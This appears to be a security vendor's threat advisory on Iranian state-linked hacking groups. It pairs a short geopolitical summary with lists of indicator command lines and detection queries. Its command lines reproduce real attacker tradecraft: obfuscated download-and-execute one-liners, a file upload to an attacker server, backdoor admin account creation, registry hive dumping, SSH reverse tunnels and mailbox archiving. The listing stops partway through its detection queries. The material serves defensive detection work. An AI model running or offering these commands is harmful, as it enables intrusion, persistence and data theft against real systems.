The Iranian Cyber Capability 2026

    Date: 03/10/2026

    Severity: Critical

    Summary

    Between 2024 and March 2026, the geopolitical landscape around Iran has shifted dramatically. What was once a tense but predictable standoff has escalated into a major regional crisis. In 2024, Iran began moving from proxy warfare toward direct military confrontation, marked by ballistic missile exchanges with Israel. Its “Axis of Resistance” still functioned then, with Syria serving as a key land bridge to supply Hezbollah in Lebanon. Cyber operations were largely conducted by the IRGC and the Ministry of Intelligence and Security against Iran’s adversaries. However, after coordinated U.S. and Israeli strikes in February 2026, Iran’s deterrence, cyber capabilities, and proxy network have been severely weakened.

    Indicators of Compromise (IOC) List

    Commandline:

    Threat Actor / Command Line

    APT34
        powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1

    APT35
        conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Biography of Mr.leehu hacohn.pdf';$pdl='Biography of Mr.leehu hacohn.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\Wow" `} ;

    APT42
        powershell -w 1 "$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm "i*x) $Pbwpc"
        copy-item C:/Users/{USER}/AppData/Local/Microsoft/Outlook/@example.com.ost ` $env:APPDATA/victim@example.com.ost
        rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk
        powershell -w 1 "$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu"
        start msedge \""hxxps[://]1drv[.]ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\";
        Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Renovation' -Value "cmd /c \"for %a in (\"%localappdata%\Microsoft\Internet Explorer\List\*\") do ( start \"\" \"%a\" )\""
        cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d "id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf\" -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt \"\" \"%temp%\\down.v7bs\" & call %b:7=%
        conhost --headless %PUBLIC%\Microsoft.bat
        %LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <chrome_pid>
        curl.exe -X POST "https://<FIREBASE-ENDPOINT>.json" -H "Content-Type: application/json" -d "{\"LastUpdatTime\":{\".sv\":\"timestamp\"}}" --ssl-no-revoke"
        powershell -w 1 $pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt); &(gcm "i*x)$pnt
        cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
        "%WINDIR%\System32\cmd.exe" /c set hm="cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %%tmolbp%% " & call %%hm:olb=%%
        msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000
        powershell -w 1 "$lb='gBjs';$uq=(invoke-restmethod -UserAgent 'Chrome' 'https://line.completely.workers.dev/aoh52');.(gcm i*ee*)$uq"

    Cyber Av3ngers
        uname -v > /tmp/{RANDOM_16_chars}.txt 2>&1
        hostname > /tmp/{RANDOM_16_chars}.txt 2>&1
        whoami > /tmp/{RANDOM_16_chars}.txt 2>&1
        date +%Z > /tmp/{RANDOM_16_chars}.txt 2>&1
        uname -r > /tmp/{RANDOM_16_chars}.txt 2>&1
        curl --http2 --header "accept: application/dns-json" "https://1.1.1.1/dns-query?name=google.com

    Dust Specter
        $di='%ALLUSERSPROFILE%\WinWebex';md $di 2>"";$path=$di+'\WinWebex.exe';Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0');[IO.File]::WriteAllBytes($path, $c.GetAsync('https://meetingapp.site/webexdownload').Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;
        "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe";New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'VLC' -Value '%ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe' -PropertyType String;New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WingetUI' -Value '%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe' -PropertyType String;

    Infy
        chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah
        chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah

    MuddyWater
        "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1
        "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline"
        "%WINDIR%\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv
        "%WINDIR%\system32\reg.exe" "%WINDIR%\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv
        netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url
        schtasks /create /tn ForceNetbirdRestart
        net localgroup Administrators user /add
        sc config sshd start= auto
        sc config netbird start= delayed-auto
        wmic useraccount where name='user' set passwordexpires=false
        net localgroup Administrateurs user /add
        powershell.exe -WindowStyle Hidden
        net user user Bs@202122 /add
        powershell.exe -Command "Copy-Item -Path %%malware path%% -Destination '%ALLUSERSPROFILE%\Logs' -Force"
        "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression
        schtasks /create /sc daily /st 09:00 /tn "DailyUpdate" /tr "%PUBLIC%\Downloads\novaservice.exe"
        powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]
        $wc = New-Object System.Net.WebClient; $wc.UploadFile("hxxp://143[.]198[.]5[.]41:443/success","%PUBLIC%\downloads\cobe-notes.txt");
        taskkill /IM novaservice.exe
        Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden
        "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE" /n
        %WINDIR%\System32\cmd.exe" /c %ALLUSERSPROFILE%\CertificationKit.ini

    Parisite
        TNC <DC-2 IP> -Port 135
        ipconfig /all
        .\SOCKSSrv.exe
        netstat -nao|findstr 28443
        ssh 104[.]238[.]191[.]185 -P 443
        ssh 104[.]238[.]191[.]185 -p 443
        Enter-PSSession -ComputerName <DC-2 IP>
        TNC <DC-2 IP> -Port 389
        netstat -nao|findstr 443
        cmd
        .\SOCKSSrv.exe
        netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443
        netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443
        netsh i p re all
        .\443.exe
        %WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe

    Tortoiseshell
        cmd.exe /C systeminfo | findstr /I "Domain"
        "%PROGRAMFILES%\WinRAR\RAR.exe" a -v1000m -m5 "%PROGRAMFILES%\WinRAR\{COMPANY_NAME}.rar" "C:/Users/{USERNAME}/AppData/Local/Microsoft/Outlook/%"
        net user DC-01$ P@ssw0rd
        %WINDIR%\system32\openssh\ssh.exe[Username]@[IP Address] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
        SCCM.exe reconfig /target:[REDACTED]

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1%"

    Detection Query 2:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "%$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm%" and commandline like "i*x)$Pbwpc"

    Detection Query 3:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%copy-item C:/Users/%/AppData/Local/Microsoft/Outlook/% $env:APPDATA/%.ost%"

    Detection Query 4:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk%"

    Detection Query 5:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "%$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu%"

    Detection Query 6:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "start msedge" and commandline like "https://1drv.ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\"

    Detection Query 7:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d" and commandline like "%id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf%" and commandline like "-X PO7ST https://prism-west-candy.glitch.me/Down" and commandline like "-o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt%" and commandline like "%temp%\\down.v7bs\ & call %b:7=%"

    Detection Query 8:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%conhost --headless %PUBLIC%\Microsoft.bat%"

    Detection Query 9:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <%>%"

    Detection Query 10:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "curl.exe -X POST" and commandline like "https://<FIREBASE-ENDPOINT>.json" and commandline like "-H" and commandline like "Content-Type: application/json" and commandline like "-d%" and commandline like "--ssl-no-revoke"

    Detection Query 11:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1" and commandline like "%$pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt);&(gcm%" and commandline like "i*x)$pnt"

    Detection Query 12:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%"

    Detection Query 13:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "/c set hm=" and commandline like "%cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https://linolbe.complolbetely.workolbers.deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %tmolbp%" and commandline like "& call %hm:olb=%"

    Detection Query 14:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000"

    Detection Query 15:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "$lb=" and commandline like "gBjs" and commandline like ";$uq=(invoke-restmethod -UserAgent Chrome https://line.completely.workers.dev/aoh52) c;.(gcm i*ee*)$uq"

    Detection Query 16:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "curl --http2 --header " and commandline like "accept: application/dns-json" and commandline like "https://1.1.1.1/dns-query?name=google.com"

    Detection Query 17:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe" and commandline like "New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name VLC -Value %ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe -PropertyType String;New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name WingetUI -Value %ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe -PropertyType String;%"

    Detection Query 18:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 19:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 20:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "%-exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1%"

    Detection Query 21:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe%" and commandline like "%/noconfig %" and commandline like "%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline%"

    Detection Query 22:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 23:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 24:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url"

    Detection Query 25:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "schtasks /create /tn ForceNetbirdRestart"

    Detection Query 26:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net localgroup Administrators user /add"

    Detection Query 27:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "sc config sshd start= auto"

    Detection Query 28:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "sc config netbird start= delayed-auto"

    Detection Query 29:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%wmic useraccount where name='%' set passwordexpires=false%"

    Detection Query 30:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net localgroup Administrateurs user /add"

    Detection Query 31:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -WindowStyle Hidden"

    Detection Query 32:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net user user Bs@202122 /add"

    Detection Query 33:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -Command " and commandline like "%Copy-Item -Path % -Destination %ALLUSERSPROFILE%\Logs -Force%"

    Detection Query 34:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51/57576?filter_relational_operator_2=60169).content" and commandline like "Invoke-Expression"

    Detection Query 35:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%schtasks /create /sc daily /st % /tn %" and commandline like "DailyUpdate" and commandline like "/tr " and commandline like "%PUBLIC%\Downloads\novaservice.exe%"

    Detection Query 36:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]"

    Detection Query 37:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "$wc = New-Object System.Net.WebClient;" and commandline like "$wc.UploadFile http://143.198.5.41:443/success" and commandline like "%PUBLIC%\downloads\cobe-notes.txt;%"

    Detection Query 38:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "taskkill /IM novaservice.exe"

    Detection Query 39:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden%"

    Detection Query 40:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%"

    Detection Query 41:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "%/c %ALLUSERSPROFILE%\CertificationKit.ini%"

    Detection Query 42:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%TNC <%> -Port 135%"

    Detection Query 43:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like ".\SOCKSSrv.exe"

    Detection Query 44:

    resourcename = "Windows Security" and eventtype = "4688" and (commandline like "netstat -nao" or commandline like "findstr 28443")

    Detection Query 45:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%Enter-PSSession -ComputerName <%>%"

    Detection Query 46:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%TNC <%> -Port 389%"

    Detection Query 47:

    resourcename = "Windows Security" and eventtype = "4688" and (commandline like "netstat -nao" or commandline like "findstr 443")

    Detection Query 48:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p re all"

    Detection Query 49:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like ".\443.exe"

    Detection Query 50:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe%"

    Detection Query 51:

    resourcename = "Windows Security" and eventtype = "4688" and (commandline like "cmd.exe /C systeminfo" or commandline like "findstr /I")

    Detection Query 52:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%PROGRAMFILES%\WinRAR\RAR.exe%" and commandline like "a -v1000m -m5" and commandline like "%PROGRAMFILES%\WinRAR\%.rar%" and commandline like "%C:/Users/%/AppData/Local/Microsoft/Outlook/%"

    Detection Query 53:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net user DC-01$ P@ssw0rd"

    Detection Query 54:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\openssh\ssh.exe[%]@[%] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070%"

    Detection Query 55:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" and commandline like "/va /f"

    Detection Query 56:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" and commandline like "/f"

    Detection Query 57:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "SCCM.exe reconfig /target:[REDACTED]"

    Detection Query 58:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Renovation -Value" and commandline like "cmd /c \"

    Detection Query 59:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "$path=$di+\WinWebex.exe;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0);[IO.File]::WriteAllBytes($path, $c.GetAsync(https://meetingapp.site/webexdownload).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;"

    Detection Query 60:

    technologygroup = "EDR" and commandline like "%powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1%"

    Detection Query 61:

    technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "%$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm%" and commandline like "i*x)$Pbwpc"

    Detection Query 62:

    technologygroup = "EDR" and commandline like "%copy-item C:/Users/%/AppData/Local/Microsoft/Outlook/% $env:APPDATA/%.ost%"

    Detection Query 63:

    technologygroup = "EDR" and commandline like "%rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk%"

    Detection Query 64:

    technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "%$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu%"

    Detection Query 65:

    technologygroup = "EDR" and commandline like "start msedge" and commandline like "https://1drv.ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\"

    Detection Query 66:

    technologygroup = "EDR" and commandline like "cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d" and commandline like "%id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf%" and commandline like "-X PO7ST https://prism-west-candy.glitch.me/Down" and commandline like "-o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt%" and commandline like "%temp%\\down.v7bs\ & call %b:7=%"

    Detection Query 67:

    technologygroup = "EDR" and commandline like "%conhost --headless %PUBLIC%\Microsoft.bat%"

    Detection Query 68:

    technologygroup = "EDR" and commandline like "%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <%>%"

    Detection Query 69:

    technologygroup = "EDR" and commandline like "curl.exe -X POST" and commandline like "https://<FIREBASE-ENDPOINT>.json" and commandline like "-H" and commandline like "Content-Type: application/json" and commandline like "-d%" and commandline like "--ssl-no-revoke"

    Detection Query 70:

    technologygroup = "EDR" and commandline like "powershell -w 1" and commandline like "%$pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt);&(gcm%" and commandline like "i*x)$pnt"

    Detection Query 71:

    technologygroup = "EDR" and commandline like "%cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%"

    Detection Query 72:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "/c set hm=" and commandline like "%cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https://linolbe.complolbetely.workolbers.deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %tmolbp%" and commandline like "& call %hm:olb=%"

    Detection Query 73:

    technologygroup = "EDR" and commandline like "msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000"

    Detection Query 74:

    technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "$lb=" and commandline like "gBjs" and commandline like ";$uq=(invoke-restmethod -UserAgent Chrome https://line.completely.workers.dev/aoh52) c;.(gcm i*ee*)$uq"

    Detection Query 75:

    technologygroup = "EDR" and commandline like "curl --http2 --header " and commandline like "accept: application/dns-json" and commandline like "https://1.1.1.1/dns-query?name=google.com"

    Detection Query 76:

    technologygroup = "EDR" and commandline like "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe" and commandline like "New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name VLC -Value %ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe -PropertyType String;New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name WingetUI -Value %ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe -PropertyType String;%"

    Detection Query 77:

    technologygroup = "EDR" and commandline like "chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 78:

    technologygroup = "EDR" and commandline like "chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 79:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "%-exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1%"

    Detection Query 80:

    technologygroup = "EDR" and commandline like "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe%" and commandline like "%/noconfig %" and commandline like "%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline%"

    Detection Query 81:

    technologygroup = "EDR" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 82:

    technologygroup = "EDR" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 83:

    technologygroup = "EDR" and commandline like "netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url"

    Detection Query 84:

    technologygroup = "EDR" and commandline like "schtasks /create /tn ForceNetbirdRestart"

    Detection Query 85:

    technologygroup = "EDR" and commandline like "net localgroup Administrators user /add"

    Detection Query 86:

    technologygroup = "EDR" and commandline like "sc config sshd start= auto"

    Detection Query 87:

    technologygroup = "EDR" and commandline like "sc config netbird start= delayed-auto"

    Detection Query 88:

    technologygroup = "EDR" and commandline like "%wmic useraccount where name='%' set passwordexpires=false%"

    Detection Query 89:

    technologygroup = "EDR" and commandline like "net localgroup Administrateurs user /add"

    Detection Query 90:

    technologygroup = "EDR" and commandline like "powershell.exe -WindowStyle Hidden"

    Detection Query 91:

    technologygroup = "EDR" and commandline like "net user user Bs@202122 /add"

    Detection Query 92:

    technologygroup = "EDR" and commandline like "powershell.exe -Command " and commandline like "%Copy-Item -Path % -Destination %ALLUSERSPROFILE%\Logs -Force%"

    Detection Query 93:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51/57576?filter_relational_operator_2=60169).content" and commandline like "Invoke-Expression"

    Detection Query 94:

    technologygroup = "EDR" and commandline like "%schtasks /create /sc daily /st % /tn %" and commandline like "DailyUpdate" and commandline like "/tr " and commandline like "%PUBLIC%\Downloads\novaservice.exe%"

    Detection Query 95:

    technologygroup = "EDR" and commandline like "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]"

    Detection Query 96:

    technologygroup = "EDR" and commandline like "$wc = New-Object System.Net.WebClient;" and commandline like "$wc.UploadFile http://143.198.5.41:443/success" and commandline like "%PUBLIC%\downloads\cobe-notes.txt;%"

    Detection Query 97:

    technologygroup = "EDR" and commandline like "taskkill /IM novaservice.exe"

    Detection Query 98:

    technologygroup = "EDR" and commandline like "%Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden%"

    Detection Query 99:

    technologygroup = "EDR" and commandline like "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%"

    Detection Query 100:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "%/c %ALLUSERSPROFILE%\CertificationKit.ini%"

    Detection Query 101:

    technologygroup = "EDR" and commandline like "%TNC <%> -Port 135%"

    Detection Query 102:

    technologygroup = "EDR" and commandline like ".\SOCKSSrv.exe"

    Detection Query 103:

    technologygroup = "EDR" and (commandline like "netstat -nao" or commandline like "findstr 28443")

    Detection Query 104:

    technologygroup = "EDR" and commandline like "%Enter-PSSession -ComputerName <%>%"

    Detection Query 105:

